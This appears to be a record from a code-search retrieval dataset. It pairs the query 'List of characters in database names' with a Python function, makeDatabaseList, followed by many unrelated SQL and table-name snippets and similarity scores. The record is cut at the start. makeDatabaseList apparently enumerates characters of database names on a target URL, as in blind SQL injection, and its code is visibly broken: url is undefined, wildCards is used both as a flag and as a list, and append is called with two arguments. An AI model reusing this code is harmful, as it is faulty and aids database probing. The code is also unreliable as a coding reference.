hex_dict) == (72, 73)", "def checkUserPassword(password):\n c.execute(\"select pwd from users where pwd = ?\", (password,))\n if c.fetchall():\n return True\n return False", "def validatePassword(password):\n\n if not(password):\n return \"You must specify your archive.org password.\"", "def decode(text, password):\r\n\tstep_index = 0\r\n\tdecoded_text = ''\r\n\tfor letter in text:\r\n\t\tdecoded_text += prev_letter(letter, to_int(password[step_index]))\r\n\t\tstep_index += 1\r\n\t\tif step_index > len(password)-1:\r\n\t\t\tstep_index = 0\r\n\treturn decoded_text", "def get_password(username):\n passw = None\n html = requests.get('https://'+ username + '/accounts').text\n\n match = RE_PASS.search(html)\n if match:\n passw = match.groups()[1]\n \n return passw.strip() if passw else None", "def get_credentials():\n user = input(\"Login: \")\n pwd = None\n while not pwd:\n pwd = getpass()\n pwd_verify = getpass('Re-enter password: ')\n if pwd != pwd_verify:\n print(\"Passwords do not match. Try again.\")\n pwd = None\n return user, pwd", "def findWithIndex(astring, achar, start):\n ix = start\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def findWithIndex(astring, achar, start):\n ix = start\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def findWithIndex(astring, achar, start):\n ix = start\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def password(): \n\n dice_list = []\n for i in range(5):\n dice_list.append(secrets.choice(range(1,7)))\n dice_key = ''.join(str(x) for x in dice_list)\n return word_dict[dice_key]", "def ask_user():\r\n password_lenght = 0\r\n while password_lenght == 0:\r\n try:\r\n password_lenght = int(input(\"How long password you want? Enter the number... \"))\r\n if password_lenght <= 0:\r\n print(\"Try to enter any number greater than 0...\")\r\n continue\r\n return password_lenght\r\n except Exception:\r\n continue", "def count_valid_passwords(passwords, validator):\n count = len(list(filter(validator, passwords)))\n print(f\"Found {count} valid passwords\")\n return count", "def getpass(self, type='IRC'):\n try:\n return self.data.passwords[type]\n except KeyError: return", "def get_bad_char(self, string, size):\n bad_char = [-1] * self.NO_OF_CHARS\n for i in range(size):\n # ord('A') == chr(65)\n bad_char[ord(string[i])] = i\n\n return bad_char" ]
[ "0.71826273", "0.6203832", "0.6179515", "0.6156986", "0.61567867", "0.60574234", "0.6030019", "0.59959686", "0.59700435", "0.5946914", "0.5921345", "0.5909927", "0.5908256", "0.58809274", "0.5878235", "0.5816463", "0.5804979", "0.5787845", "0.5780203", "0.57457215", "0.57276505", "0.57061714", "0.56991327", "0.5696502", "0.56824", "0.56646657", "0.56593484", "0.554374", "0.55170935", "0.54889387", "0.5488624", "0.54753053", "0.54709226", "0.5460054", "0.5458399", "0.5442453", "0.54064155", "0.5388815", "0.5381073", "0.5374619", "0.5372235", "0.5365271", "0.5346822", "0.53415304", "0.5322688", "0.5313276", "0.5306224", "0.5290582", "0.5284623", "0.52774435", "0.5266996", "0.52500397", "0.52437717", "0.5233768", "0.5233768", "0.523184", "0.5230006", "0.52176505", "0.52131087", "0.52127284", "0.52101624", "0.52039045", "0.51999295", "0.5197193", "0.5193874", "0.51898724", "0.5189013", "0.5171414", "0.51630574", "0.51613504", "0.51546735", "0.5153065", "0.51518655", "0.5145282", "0.5130778", "0.5129122", "0.5120669", "0.5114207", "0.51079863", "0.51079863", "0.51079863", "0.51079863", "0.50936604", "0.50865626", "0.50714594", "0.5071445", "0.5062734", "0.5061607", "0.50575644", "0.5054311", "0.5045905", "0.5044882", "0.50405246", "0.50405246", "0.50405246", "0.5040087", "0.5036907", "0.5036633", "0.50348866", "0.50328493" ]
0.77611613
0
List of characters in table names
def makeTableList(url, caseSensitive = False, wildCards = True): charList = [] for ch in lower: # ch = str(ch) if(characterInTableName(ch, url)): charList.append(ch) for ch in numbers: ch = str(ch) if(characterInTableName(ch, url)): charList.append(ch) for ch in special: ch = str(ch) if(characterInTableName(ch, url)): charList.append(ch) for ch in other: ch = str(ch) if(characterInTableName(ch, url)): charList.append(ch) if(caseSensitive): for ch in upper: # ch = str(ch) if(characterInTableName(ch, url)): charList.append(ch, url) if(wildCards): for ch in wildCards: # ch = str(ch) if(characterInTableName(ch, url)): charList.append(ch, url) return charList
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def table_names(self, cursor=None):\r\n return [kind.key().name() for kind in Query(kind='__kind__').Run()]", "def makeTableNamesList(n, ):", "def get_table_column_name(self, table):\n c = self.conn.cursor()\n c.execute(\"SELECT * FROM %s\" % table)\n names = list(map(lambda x: x[0], c.description))\n return names", "def get_table_names() -> Iterable[str]:\n for pipeline_name in get_pipeline_names():\n yield pipeline_name.replace(\"_\", \"-\")", "def table_name() -> str:\n pass", "def scrub(self, table_name):\n\n return ''.join( chr for chr in table_name if chr.isalnum() )", "async def tables(self) -> List[bytes]:\n names = await self.client.getTableNames()\n\n # Filter using prefix, and strip prefix from names\n if self.table_prefix is not None:\n prefix = self._table_name(b'')\n offset = len(prefix)\n names = [n[offset:] for n in names if n.startswith(prefix)]\n\n return names", "def getTableNames(self):\n\n # The specific command depends on whether we are using mysql or sqlite\n if self.connector == 'mysql':\n sqlcmd = (\"SELECT table_name FROM INFORMATION_SCHEMA.TABLES \" +\n \"WHERE table_schema='\" + self.dbname + \"'\")\n else:\n sqlcmd = \"SELECT name FROM sqlite_master WHERE type='table'\"\n\n self._c.execute(sqlcmd)\n tbnames = [el[0] for el in self._c.fetchall()]\n\n return tbnames", "def show_tables(self) -> List[str]:\n return list(self.tb.keys())", "def getAllName(table):\n\ttry:\n\t\tcon = sqlite3.connect('PampDb.db')\n\t\tcur = con.cursor()\n\t\tcur.execute(\"SELECT * FROM \" + table)\n\t\tnames = cur.fetchall()\n\t\tcon.commit()\n\t\tcon.close()\n\t\treturn names\n\texcept:\n\t\tprint('Could not run function getAllName from DbController')", "def _extract_ks_tab(name):\n sp = name.split(\".\")\n if len(sp) == 2:\n ksp = sp[0]\n table = sp[1]\n else:\n ksp = config.execution_name\n table = name\n return ksp.lower().encode('UTF8'), table.lower().encode('UTF8')", "def get_table_names(conn, schema, prefix='', suffix=''):\n query = f\"select table_name from information_schema.tables where table_schema = '{schema}'\"\n table_names = pd.read_sql(query, con=get_connection()).to_numpy(copy=True).flatten()\n table_names = [t for t in table_names if t.startswith(prefix) and t.endswith(suffix)]\n return table_names", "def getTableNames(self):\n\tif not self.dbNames:\n\t # get db table names from DB\n\t if self.dbType==\"sqlite\":\n\t query=\"SELECT name FROM sqlite_master WHERE type='table';\"\n\t elif self.dbType==\"mysql\":\n\t query=\"SHOW TABLES\"\n\t self.startTxn(\"SQLUtil.__init__\")\n\t tup=self.fetchAll(query)\n\t self.endTxn(\"SQLUtil.__init__\")\n\t for item in tup:\n\t self.dbNames.append(item[0])\n\treturn self.dbNames", "def getTables(self):\n\treturn self.dbNames", "def names(self) -> list[str]:", "def colNames_string(self):\n # SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'some_table';\n return \"SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = \"", "def _table_name(self, name: AnyStr) -> bytes:\n name = ensure_bytes(name)\n if self.table_prefix is None:\n return name\n return self.table_prefix + self.table_prefix_separator + name", "def get_table_names(self):\n return self.engine.table_names()", "def symbol_table(self) -> str:\n return self._symbol_table", "def tablename(self):\n _, tail = os.path.split(self.url)\n return tail[:-4]", "def encodeTableName(self, schema, table):\r\n return '\"{}\".\"{}\"'.format(schema, table)", "def standardize_table_name(self, schema_name: str, table: str) -> str:\n return table", "def names(cls) -> List[str]:", "def Fetch_All_Table_Names(self, d_params=None):\n ctx = self.__Connect_To_Snowflake(d_params)\n all_tables = ctx.cursor().execute(\"show tables\")\n ctx.close()\n return [x[1] for x in all_tables]", "def clean_table_name(table_name):\n path_underscore = table_name.translate(table_name.maketrans(\"-. \", \"___\"))\n return \"_\".join(filter(None, path_underscore.split(\"_\")))", "def listOSWTables(conn):\n conn_cursor = conn.cursor()\n conn.text_factory = str\n res = conn.execute(\"SELECT name FROM sqlite_master WHERE type='table';\")\n tables=[name[0] for name in res]\n return tables", "def test_table_name(self):\n obs = PrepTemplate._table_name(1)\n self.assertEqual(obs, \"prep_1\")", "def _prepare_tables_string(tables_list):\n tables_string = \"\"\n for table in tables_list:\n tables_string = \"{0} {1}\".format(tables_string, table)\n return tables_string", "def get_colnames(self):\n\n cd = self.conn.execute('select * from atom')\n print('Possible column names are:')\n names = list(map(lambda x: x[0], cd.description))\n print('\\trowID')\n for n in names:\n print('\\t'+n)", "def tableName():\n return \"people\"", "def table_col(file_name='tpch'):\n \n path = './data/' + file_name + \"/sql/{}-create.sql\".format(\"tpch\")\n regex = re.compile(';\\($')\n \n tbl_name = {}\n tbl = \"\"\n with open(path, 'r') as f:\n for line in f.readlines():\n if \"CREATE TABLE\" in line:\n tbl = line.split()[2]\n tbl_name[tbl.lower()] = []\n elif line != \"\\n\" and ');' not in line and regex.search(line) == None:\n col = line.split()[0]\n tbl_name[tbl.lower()].append(col.lower())\n return tbl_name", "def names():\n pass", "def get_table_names(self,verbose=False):\n \n assert(self.connected)\n \n \n GET_TABLE_NAMES_COMMAND = \"SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = '{0}'\".format(self.config['database'])\n \n self.cursor.execute(GET_TABLE_NAMES_COMMAND)\n \n tables = []\n for row in self.cursor:\n tables.append(row[0])\n \n return tables", "def table_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"table_name\")", "def s3_table_random_name():\n\n alpha = \"abcdefghijklmnopqrstuvwxyz\"\n return ''.join(random.choice(alpha) for _ in range(8))", "def list_tables(self, context=\"MYDB\"):\n q = 'SELECT Distinct TABLE_NAME FROM information_schema.TABLES'\n res = self.quick(q, context=context, task_name='listtables', system=True)\n # the first line is a header and the last is always empty\n # also, the table names have \" as the first and last characters\n return list(res[\"TABLE_NAME\"])", "def get_tables(self, db_name):\n pass", "def _str_colnames(self):\n return ', '.join(self.galcat.colnames)", "def makeDatabaseNamesList(n, ):", "def getTableByName(self, tablename):\n pass", "def extract_ks_tab(name):\n if not name:\n return None, None\n\n sp = name.split(\".\")\n if len(sp) == 2:\n ksp = sp[0]\n table = sp[1]\n else:\n ksp = config.execution_name\n table = name\n return ksp.lower(), table.lower()", "def get_colnames(cur, table):\n cur.execute(\"\"\"DESCRIBE {}\"\"\".format(table))\n cols = cur.fetchall()\n return [col[0] for col in cols]", "def table_name(self) -> str:\n return \"OLTP\"", "def _get_fields(self):\n fields = self.table[0]\n fields = filter(None.__ne__, fields)\n return list(map(str.lower, fields))", "def tablename(klass):\n if not hasattr(klass, 'TABLENAME'):\n inf = Inflector()\n klass.TABLENAME = inf.tableize(klass.__name__)\n return klass.TABLENAME", "def get_list_from_table(sqlite_connection, table_name):\n\n def camelize(s): # 'aa_bb_cc_dd' --> 'AaBbCcDd'\n return \"\".join(word.title() for word in s.split(\"_\"))\n\n cursor = sqlite_connection.execute(f\"SELECT * FROM {table_name}\")\n col_names = \" \".join(col_desc[0] for col_desc in cursor.description)\n nt = collections.namedtuple(camelize(table_name), col_names)\n return [nt(*row) for row in cursor.fetchall()]", "def getTableKeys(self, tableName):\n sql = \"SHOW COLUMNS FROM %s\" % tableName\n resultSet = []\n try:\n results = self.selectOpt(sql)\n for r in results:\n resultSet.append(r['Field'])\n except:\n print(\"[ERROR] Table '%s' does not exist.\" % tableName)\n return resultSet", "def test_split_table_name(self):\n\n self.assertEqual(\n {\"database\": \"database\", \"database_schema\": \"schema\", \"table\": \"table\"},\n fqn.split_table_name(table_name=\"database.schema.table\"),\n )\n\n self.assertEqual(\n {\"database\": None, \"database_schema\": \"schema\", \"table\": \"table\"},\n fqn.split_table_name(table_name=\"schema.table\"),\n )\n\n self.assertEqual(\n {\"database\": None, \"database_schema\": None, \"table\": \"table\"},\n fqn.split_table_name(table_name=\"table\"),\n )\n\n # We also clean quotes\n self.assertEqual(\n {\"database\": \"database\", \"database_schema\": \"schema\", \"table\": \"table\"},\n fqn.split_table_name(table_name='database.\"schema\".table'),\n )", "def _exceptions_lists_tblname(self):\n return 'exceptions_lists'", "def selectnamesC(data):\n col = []\n for name in list(data):\n if name.startswith('headstrong_'):\n col.append(name)\n else:\n col = col\n \n return col", "def column_names(\n self,\n table: exp.Table | str,\n only_visible: bool = False,\n dialect: DialectType = None,\n normalize: t.Optional[bool] = None,\n ) -> t.List[str]:", "def getNames(self) -> List[unicode]:\n ...", "def tables(self):\n if self.table is None:\n raise GiraffeError(\"Target table has not been set.\")\n return [\n \"{}_wt\".format(self.table),\n \"{}_log\".format(self.table),\n \"{}_e1\".format(self.table),\n \"{}_e2\".format(self.table),\n ]", "def tables_dict(self):\n return self.tables.table_name_map", "def get_name(tablename):\n\n return tablename[tablename.find(\"_\") + 1:].replace(\"_\", \" \").capitalize()", "def get_table_list(self):\n # the \\\"{{}}\\\" is where the sql command will be added via a second `.format()`\n container_command = \"docker exec {} sh -c \\\"{{}}\\\"\".format(self.mysql_container)\n sql_command = \"mysql {} --execute='SHOW TABLES FROM {};'\".format(self.mysql_credentials, self.database_name)\n table_list = self.shell(container_command.format(sql_command))\n table_list = table_list.split(\"\\n\")\n assert table_list[0] == \"Tables_in_{}\".format(self.database_name)\n return table_list[1:]", "def selectnamesD(data):\n col = []\n for name in list(data):\n if name.startswith('hyperactive_'):\n col.append(name)\n else:\n col = col\n \n return col", "def table_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"table_name\")", "def table_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"table_name\")", "def table_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"table_name\")", "def __random_table_name(self):\n return 'tmp_%s_%s' % (self._xid(), ''.join(\n random.choice('abcdefghijklmnopqrstuvwxyz')\n for _ in range(8)\n ))", "def showTables(database: str) -> list:\n\n bd = _database(database)\n\n if bd:\n\n temp = []\n\n for tabla in bd[\"tablas\"]:\n temp.append(tabla[\"nombre\"])\n\n return temp\n\n else:\n return None", "def find_table_command(input_file):\n contents = open(input_file, 'r')\n file = \"\".join(contents)\n table_title = find_table(input_file)[1]\n table_command =[]\n for title in table_title:\n stString = 'CREATE TABLE '+str(title)+ ' ('\n start = file.find(stString)\n end = file.find(');', start)\n word_list = file[start+len(stString):end].split(',')\n table_command.append(stString+ ','.join(word_list)+');')\n\n return table_command", "def _get_escape_translation_table(cls) -> List[str]:\n _escape_table = [chr(x) for x in range(128)]\n _escape_table[0] = \"\\\\0\"\n _escape_table[ord(\"\\\\\")] = \"\\\\\\\\\"\n _escape_table[ord(\"\\n\")] = \"\\\\n\"\n _escape_table[ord(\"\\r\")] = \"\\\\r\"\n _escape_table[ord(\"\\032\")] = \"\\\\Z\"\n _escape_table[ord('\"')] = '\\\\\"'\n _escape_table[ord(\"'\")] = \"\\\\'\"\n return _escape_table", "def _get_char_names(self):\n return [device.get_char_name() for\n device in self.all_devices]", "def __tablename__(self):\n return sub(r\"(?<!^)(?=[A-Z])\", \"_\", self.__name__).lower()", "def columns(self, table_name):\n table = self._create_table(table_name)\n return [c.name for c in table.c]", "def table_columns(auth, table_name):\n return [row[0] for row in DBMySQL.csfr(auth, \"describe \" +table_name)]", "def meta_db_tables(self) -> list:\r\n def _passer(**kwargs):\r\n data = self.engine.execute(\"\"\"\r\n SELECT * FROM sqlite_master WHERE type='table';\r\n \"\"\").fetchall()\r\n table_names = [i[1] for i in data]\r\n return table_names\r\n return self._connectionController(_passer)", "def tablename(entity) -> str:\n return entity.__tablename__", "def delta_table_name(self):\n if len(self._old_table.name) < constant.MAX_TABLE_LENGTH - 10:\n return constant.DELTA_TABLE_PREFIX + self._old_table.name\n elif (\n len(self._old_table.name) >= constant.MAX_TABLE_LENGTH - 10\n and len(self._old_table.name) < constant.MAX_TABLE_LENGTH - 2\n ):\n return constant.SHORT_DELTA_TABLE_PREFIX + self._old_table.name\n else:\n return constant.DELTA_TABLE_PREFIX + constant.GENERIC_TABLE_NAME", "def test_table_name(self):\n obs = SampleTemplate._table_name(self.test_study.id)\n self.assertEqual(obs, \"sample_1\")", "def _exceptions_lists_delta_part_tblname(self, operator_id):\n return '{0}_{1}'.format(self._exceptions_lists_delta_tblname, operator_id)", "def named_entities(self) -> List[str]:", "def _exceptions_lists_part_tblname(self, operator_id):\n return '{0}_{1}'.format(self._exceptions_lists_tblname, operator_id)", "def get_table_name(self):\n return self._table", "def query_tables(self):\n # Find all tables\n tables_q = \"SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE \\'sqlite_%\\';\"\n tables = self.query(tables_q)\n # print(tables)\n return tables", "def tname(self) -> str:", "def names(self) -> List:\n ...", "def stores(self):\n sql = u\"SELECT name FROM `sqlite_master` WHERE type='table'\"\n rows = self.conn.execute(sql)\n return [r['name'] for r in rows\n if r['name'] not in self.invalid_names]", "def show_tables(db_name):\n output = execute_sql(db_name, \"SELECT name FROM sqlite_master WHERE type='table';\")\n return output", "def name(self) -> str:\n return self.fqtable.replace(\".\", \"_\")", "def getTableHead():\n return [\"Reporter\", \"Reportee\", \"aln. DKIM\", \"aln. SPF\", \"Disposition\",\n \"DKIM result\", \"SPF result\", \"msg#\", \"IP\", \"Country\",\n \"Report Begin\", \"Report End\", \"Report ID\"]", "def show_tables(self):\n query = \"SELECT name FROM sqlite_master WHERE type = 'table'\"\n try:\n temp = self.__cur.execute(query)\n except Exception as e:\n self.__conn.rollback()\n raise e\n\n tables = []\n for x in temp:\n tables.append(x[\"name\"])\n del temp\n return tables", "def tables(self):\n result = self.execute(self.commands.get_tables(self.name))\n return [x[0] for x in result]", "def generate_rename_tabled(self, prefix):\n return \"#define %s%s g_symbol_table.%s\" % (prefix, self.__name, self.__name)", "def names(self):\n\t\treturn", "def searchColumnHeadings(self, table: Table):\n lista = []\n if table:\n for col in table.columns:\n lista.append(col.name)\n return lista\n return None", "def get_tables(conn):\n cur = conn.cursor()\n cur.execute(\"\"\"SELECT name FROM sqlite_master\n WHERE type='table' AND name NOT LIKE 'sqlite_%';\n \"\"\")\n tables = cur.fetchall()\n\n return tables", "def tables(self) -> list:\n return self.list_tables()", "def getTableNames(self, lsstLevel, dbName):\n return self._doRequest(self.httpClient.getTableNames, lsstLevel, dbName)", "def name(self) -> str:\n return f\"lookup_table_{self.table_number}\"", "def table_name_unpacker(from_string: str, separator: str = \",\") -> List[Tuple[str, str]]:\n\n if not from_string or not from_string.strip():\n raise ValueError(\"The string containing the from clause is missing or empty.\")\n\n tables = []\n table_names = from_string.split(separator)\n for table in table_names:\n table = table.strip()\n table = table.split(\" \")\n if len(table) == 2:\n tables.append((table[0], table[1]))\n elif len(table) == 1:\n tables.append((table[0], \"\"))\n\n return tables", "def __getFontTable(self):\n\n fontTable = \"{\\\\fonttbl\\n\"\n for font in self.fonts:\n fontTable += \"%s\\n\" % font.getRtf()\n return fontTable + \"}\\n\"", "def get_split_col_names():\n return ['dna_%d' % (idx+1) for idx in range(60)]", "def getColumnNames(self, tablename):\n\n # Check if tablename exists in database\n if tablename in self.getTableNames():\n # The specific command depends on whether we are using mysql or\n # sqlite\n if self.connector == 'mysql':\n sqlcmd = \"SHOW COLUMNS FROM \" + tablename\n self._c.execute(sqlcmd)\n columnnames = [el[0] for el in self._c.fetchall()]\n else:\n sqlcmd = \"PRAGMA table_info(\" + tablename + \")\"\n self._c.execute(sqlcmd)\n columnnames = [el[1] for el in self._c.fetchall()]\n\n return columnnames\n\n else:\n print('Error retrieving column names: Table does not exist on ' +\n 'database')\n return []", "def __tablename__(cls) -> str:\n return inflection.underscore(cls.__name__)", "def get_feature_names(self):\n return [self.char]", "def get_names(view, sel):\n word = view.word(sel)\n schema = None\n if view.substr(word.begin() - 1) == '.':\n schema = view.substr(view.word(word.begin() - 2)).lower()\n return schema, view.substr(word).lower()", "def get_tables_from_db(self):\r\n self.cursor.execute(\"SELECT name FROM sqlite_master WHERE type = 'table';\")\r\n\r\n # Return list of tuples with the names of tables --> names of profiles.\r\n self.profiles_name_list = [elem[0] for elem in self.cursor.fetchall()]\r\n self.profiles_name_list = tuple(self.profiles_name_list)" ]
[ "0.6977511", "0.68698466", "0.66727006", "0.6658325", "0.6603546", "0.65911764", "0.6573043", "0.6499986", "0.6483981", "0.6470874", "0.6378552", "0.6191215", "0.61647415", "0.614972", "0.61342114", "0.610629", "0.6102741", "0.6078974", "0.60369515", "0.5990207", "0.5947591", "0.5935245", "0.58472365", "0.58406013", "0.5825376", "0.5823207", "0.5817067", "0.5812491", "0.5791166", "0.5771058", "0.5763561", "0.5748314", "0.5735055", "0.5732467", "0.5718774", "0.57170093", "0.57164747", "0.5705593", "0.570374", "0.5700912", "0.56985927", "0.56978196", "0.5685264", "0.5674141", "0.56707734", "0.56693226", "0.566613", "0.56529766", "0.56482077", "0.5641952", "0.56402624", "0.56376195", "0.5637251", "0.56357855", "0.56270856", "0.5624137", "0.5613276", "0.5611919", "0.5611919", "0.5611919", "0.5607274", "0.55963176", "0.559204", "0.55867857", "0.55866766", "0.5585967", "0.5580438", "0.55797327", "0.5575031", "0.5574478", "0.5574022", "0.5572378", "0.55556405", "0.5550132", "0.55428064", "0.55397356", "0.5532043", "0.5528734", "0.55269766", "0.5508176", "0.5505703", "0.550026", "0.54891133", "0.5484301", "0.548266", "0.5478682", "0.5472434", "0.5468696", "0.546395", "0.54626495", "0.5459807", "0.54589516", "0.5446277", "0.54250354", "0.54216325", "0.5419601", "0.54115", "0.5404347", "0.54042757", "0.5399363" ]
0.57981765
28
List of characters in database names
def makeDatabaseList(): charList = [] for ch in lower: # ch = str(ch) if(characterInDatabaseName(ch, url)): charList.append(ch) for ch in numbers: ch = str(ch) if(characterInDatabaseName(ch, url)): charList.append(ch) for ch in special: ch = str(ch) if(characterInDatabaseName(ch, url)): charList.append(ch) for ch in other: ch = str(ch) if(characterInDatabaseName(ch, url)): charList.append(ch) if(caseSensitive): for ch in upper: # ch = str(ch) if(characterInDatabaseName(ch, url)): charList.append(ch, url) if(wildCards): for ch in wildCards: # ch = str(ch) if(characterInDatabaseName(ch, url)): charList.append(ch, url) return charList
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def makeDatabaseNamesList(n, ):", "def get_database_names(self) -> Iterable[str]:\n custom_database_name = self.service_connection.__dict__.get(\"databaseName\")\n\n database_name = self.service_connection.__dict__.get(\n \"database\", custom_database_name or \"default\"\n )\n # By default, set the inspector on the created engine\n self.inspector = inspect(self.engine)\n yield database_name", "def _get_database_name(database):\n # make sure the return is only one data type\n filenames = []\n if database is not None:\n if not isinstance(database, list):\n database = [database]\n for db in database:\n filenames += glob.glob(db)\n\n return filenames", "def _get_db_names(self, dbs, strict=True):\n dbs = utils.coerce_to_list(dbs)\n db_names = [utils.get_name(db) for db in dbs]\n if strict:\n good_dbs = self.instance.list_databases()\n good_names = [utils.get_name(good_db) for good_db in good_dbs]\n bad_names = [db_name for db_name in db_names\n if db_name not in good_names]\n if bad_names:\n bad = \", \".join(bad_names)\n raise exc.NoSuchDatabase(\"The following database(s) were not \"\n \"found: %s\" % bad)\n return db_names", "def _get_char_names(self):\n return [device.get_char_name() for\n device in self.all_devices]", "def donor_names():\n return list(donor_db.keys())", "def getAllName(table):\n\ttry:\n\t\tcon = sqlite3.connect('PampDb.db')\n\t\tcur = con.cursor()\n\t\tcur.execute(\"SELECT * FROM \" + table)\n\t\tnames = cur.fetchall()\n\t\tcon.commit()\n\t\tcon.close()\n\t\treturn names\n\texcept:\n\t\tprint('Could not run function getAllName from DbController')", "def getDatabaseName(self):\n return f\"n{self.name.capitalize()}\"", "def donor_names():\n return donor_db.keys()", "def get_available_databases() -> List[str]:\r\n\tcur = psycopg2.connect(dbname='postgres').cursor()\r\n\tcur.execute(\"SELECT datname FROM pg_database WHERE datistemplate=FALSE;\")\r\n\treturn [row[0][:-6] for row in cur if row[0].endswith('wikidb')]", "def dbdescs(data, dbname):\n # pylint: disable=bad-continuation\n return {\n 'admin': onedesc(data, dbname, 'admin', 'rw'),\n 'user': onedesc(data, dbname, 'user', 'rw'),\n 'viewer': onedesc(data, dbname, 'viewer', 'ro')\n }", "def get_all_collection_names(self):\n select_list = [SQLBinaryExpr(SQLColumnExpr(SQLTableExpr(TABLE_NAME_COLL), COL_NAME_COLL_NAME),\n OP_AS, COL_NAME_COLL_NAME)]\n\n entries = self.select_generic_data(select_list=select_list, table_list=[TABLE_NAME_COLL])\n return [entrie[COL_NAME_COLL_NAME] for entrie in entries]", "def donor_names():\n names = list()\n for name in donor_db:\n names = names + [name[0]]\n return names", "def db_collations_choices(self):\n # To avoid pre-mature initialization of db-context.\n from django.db import connection\n\n with connection.cursor() as cursor:\n cursor.execute(\"SELECT collname, collcollate FROM pg_collation\")\n rows = cursor.fetchall()\n return ((name, \"{} ({})\".format(name, collate)) for name, collate in rows)", "def names(self) -> list[str]:", "def get_char_names(charlist, caller):\n watch_list = caller.db.watching or []\n verbose_where = False\n if caller.tags.get(\"verbose_where\"):\n verbose_where = True\n return \", \".join(\n char_name(char, verbose_where, watch_list)\n for char in charlist\n if char.player\n and (not char.player.db.hide_from_watch or caller.check_permstring(\"builders\"))\n )", "def do_list(self, line):\n\t\tx = [i for i in self.client.list_databases() if i['name'] not in ['admin','config','line','local','mongoengine_test','pymongo_test']]\n\t\tfor db in x:\n\t\t\tprint(db['name'])", "def getTableNames(self):\n\tif not self.dbNames:\n\t # get db table names from DB\n\t if self.dbType==\"sqlite\":\n\t query=\"SELECT name FROM sqlite_master WHERE type='table';\"\n\t elif self.dbType==\"mysql\":\n\t query=\"SHOW TABLES\"\n\t self.startTxn(\"SQLUtil.__init__\")\n\t tup=self.fetchAll(query)\n\t self.endTxn(\"SQLUtil.__init__\")\n\t for item in tup:\n\t self.dbNames.append(item[0])\n\treturn self.dbNames", "def get_available_databases():\n return map(\n lambda (key, value): (key, value[\"description\"]),\n DumpConverter.DATABASES.items())", "def get_names_from_Seq_db(seq_db):\r\n names = []\r\n names_abudance_removed = []\r\n db = open(seq_db, \"r\")\r\n for seq_record in SeqIO.parse(db, \"fasta\"):\r\n if seq_record.id.endswith(\"_1\"):\r\n names.append(seq_record.id)\r\n names_abudance_removed.append((\"_\").join(\r\n seq_record.id.split(\"_\")[:-1]))\r\n else:\r\n names_abudance_removed.append(seq_record.id)\r\n names.append(seq_record.id + \"_1\")\r\n db.close()\r\n return names, names_abudance_removed", "def colNames_string(self):\n # SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'some_table';\n return \"SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = \"", "def get_usernames(self) -> list:\n db_list = list(self.cursor.execute('SELECT * FROM sqlite_master'))\n users = [db_list[i][1] for i in range(0, len(db_list), 2)]\n return users", "def get_db_object_name(name):\n\n # Default output list\n out_list = ['lemma', 'dbo', 'udb_plt']\n\n # Replace the elements of out_list if and only if there exists a\n # replacement for it\n parts = name.split('.')\n for (i, j) in enumerate(range(len(parts) - 1, -1, -1)):\n if parts[j]:\n out_list[(len(out_list) - 1) - i] = parts[j]\n return tuple(out_list)", "def getDatabaseName(self):\n raise NotImplementedError", "def scrub(self, table_name):\n\n return ''.join( chr for chr in table_name if chr.isalnum() )", "def db_name(self):\n return self._db_name", "def get_db_format(text):\n db_text = \"\"\n for t in text.split(\" \"):\n db_text += t.title()\n return db_text", "def testCMSNametoList(self):\n result = self.mySiteDB.cmsNametoList(\"T1_US*\", \"SE\")\n self.assertItemsEqual(result, [u'cmsdcadisk01.fnal.gov'])", "def queryList():\n #f = open(\"/var/log/scidbpy_log.txt\",\"w+\")\n #f.write(\"starting queryList\")\n\n header, rows = querySciDB(\"list('arrays')\")\n names = [row[1].translate(None, \"\\\"\") for row in rows]\n\n return names", "def get_all_bank_names() -> List[str]:\n\n # Open a new connection\n db, cursor = db_connector.cursor()\n\n query = \"select name from bank\"\n cursor.execute(query)\n data = cursor.fetchall()\n r_list = [x[0] for x in data]\n db.disconnect()\n return r_list", "def _extract_db_name_from_db_path(self):\n return os.path.basename(self.db_path).rsplit('.', 1)[0]", "def _str_colnames(self):\n return ', '.join(self.galcat.colnames)", "def database_name(self) -> str:\n return pulumi.get(self, \"database_name\")", "def getTables(self):\n\treturn self.dbNames", "def named_entities(self) -> List[str]:", "def make_db_name_pattern(species=None, db_type=None, release=None):\n sep = r\"%\"\n pattern = \"\"\n if species:\n species = Species.getEnsemblDbPrefix(species)\n pattern = \"%s%s\" % (sep, species)\n if db_type:\n pattern = \"%s%s%s\" % (pattern, sep, db_type)\n if release:\n pattern = \"%s%s%s\" % (pattern, sep, release)\n assert pattern\n \n return \"'%s%s'\" % (pattern, sep)", "def _to_db_identifier(name):\n return name.replace('-', '_')", "def create_short_database_names(path_list):\n no_suffixes = [Path(p).resolve().with_suffix(\"\") for p in path_list]\n # The assert statement makes sure that the while loop terminates\n assert len(set(no_suffixes)) == len(\n no_suffixes\n ), \"path_list must not contain duplicates.\"\n short_name_to_path = {}\n for path, path_with_suffix in zip(no_suffixes, path_list):\n parts = tuple(reversed(path.parts))\n needed_parts = 1\n candidate = parts[:needed_parts]\n while _causes_name_clash(candidate, no_suffixes):\n needed_parts += 1\n candidate = parts[:needed_parts]\n\n short_name = \"/\".join(reversed(candidate))\n short_name_to_path[short_name] = path_with_suffix\n return short_name_to_path", "def table_names(self, cursor=None):\r\n return [kind.key().name() for kind in Query(kind='__kind__').Run()]", "def list_databases(self) -> List[Dict]:\n self._check_connection(check_db=False)\n all_data = 